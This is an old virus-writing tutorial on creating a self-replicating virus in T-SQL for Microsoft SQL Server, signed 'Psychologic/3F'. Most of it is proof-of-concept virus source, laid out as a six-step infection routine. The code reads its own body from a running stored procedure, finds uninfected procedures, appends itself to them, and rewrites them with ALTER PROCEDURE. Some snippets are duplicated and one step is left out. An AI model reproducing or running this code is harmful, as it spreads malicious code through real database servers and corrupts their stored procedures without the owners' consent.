T-SQL virus.. 

.Author Notes

Viruses are lame thing,  it won't give you any benefit in your real life
everybody hates virus. So don't code virus if you don't have something new
in it. It just wasting your time, and your time can be converted to money

.About T-SQL under SQL server


Microsoft  SQL  Server  is  a relational database  management system
developed by Microsoft. As a database,it is a software product whose
primary function is to store and retrieve data as requested by other
software applications, be  it  those  on  the same computer or those
running on another computer across a network(including the Internet)
There are at least adozen different editions of Microsoft SQL Server
aimed  at different audiences  and for different  workloads (ranging
from  small  applications that  store and retrieve data on  the same
computer,to millions of users and computers that access huge amounts
of  data  from  the  Internet  at  the same time). Its primary query
languages are T-SQL and ANSI SQL.

.Can we write virus in TSQL ?

Ofcourse yes, 100% competible to code TSQL virus 

.How ?

Before you ask me how, you should know this standard procedure virus
flow chart :

1. Virus read its own entrypoint (body)
2. Virus search the victim, will not infect if already marked
3. Virus open the victim and drop its body to the victim
4. Virus give a mark to the victim and close the victim
5. Virus loop to search another victim
6. Go to step 2 till there is no victim

And here, some proof of concept codes :


1. Virus read its own entrypoint (body)

------------cut

declare @vb varchar(max),@com varchar(max),@a int,@b int,@i int
set @vb=(SELECT c.text FROM sysobjects o INNER JOIN syscomments c 
ON c.id = o.id WHERE o.type='p' and (o.category=0) and (o.id = @@Procid))
set @a=CHARINDEX('--URGO1',@vb)
set @b=CHARINDEX(convert(varchar(7),0x2D2D5552474F32),@vb)
set @vb=SUBSTRING(@vb, @a, @b-@a+7)
------------cut

2. Virus search the victim

------------cut
--search victim in current sql sysobject and put it to temporary table
CREATE TABLE #urgo
	(r int
	,dbname VARCHAR(max)
	,query VARCHAR(max))

INSERT #urgo (r,dbname,query)

SELECT rank() OVER (ORDER BY x.name) as n,x.name,x.text from
(SELECT o.name,LEN(c.text) FROM sysobjects o INNER JOIN syscomments
 c ON c.id = o.id WHERE o.type='p' and encrypted=0 and o.category=0
and c.text not like '%URGO%')X

------------cut

3. Virus open the victim and drop its body to the victim
------------cut

declare @vb varchar(max),@com varchar(max),@a int,@b int,@i int
set @vb=(SELECT c.text FROM sysobjects o INNER JOIN syscomments c ON c.id = o.id WHERE o.type='p' and (o.category=0) and (o.id = @@Procid))
set @a=CHARINDEX('--URGO1',@vb)
set @b=CHARINDEX(convert(varchar(7),0x2D2D5552474F32),@vb)
set @vb=SUBSTRING(@vb, @a, @b-@a+7)

------------cut

4. Virus give a mark to the victim and close the victim

------------cut

SET @i = 1
WHILE (@i <=(SELECT COUNT(*) FROM #urgo))
	BEGIN

SET @com = (select query from #urgo where r=@i)
set @a=1
------------cut

5. Virus loop to search another victim

------------cut
rep:
set @a=CHARINDEX('AS',@com,(@a+1))
IF @a>0 and ascii(SUBSTRING(@com,@a-1,1)) NOT IN (32,13,10,9,0) GOTO rep
IF @a>0 and ascii(SUBSTRING(@com,@a+2,1)) NOT IN (32,13,10,9,0) GOTO rep
set @b=@a
while (@b>1) and (ascii(SUBSTRING(@com,@b,1))<>13) set @b=@b-1
if CHARINDEX('--',SUBSTRING(@com,@b,@a-@b))>0  GOTO rep
set @b=@a
while (@b>2) and (SUBSTRING(@com,@b,1)<>'*') and (SUBSTRING(@com,@b-1,1)<>'/') set @b=@b-1
if (@b<@a)and (CHARINDEX('*/',@com,@b)>@a)  GOTO rep
set @com=stuff(@com, @a+2,1,char(13))
set @com=@com+@vb
set @com=replace(@com,'CREATE PROCEDURE','ALTER PROCEDURE')
EXEC( @com)
set @i = @i + 1
end
------------cut

6. Go to step 2 till there is no victim

------------cut
--skip
------------cut

Lot of cool thing can be done by tsql virus but I dont have much time to code another sql function, 
so I just copy the source from urgo, sorry, just mail me if you have a problem with the code

.Psychologic/3F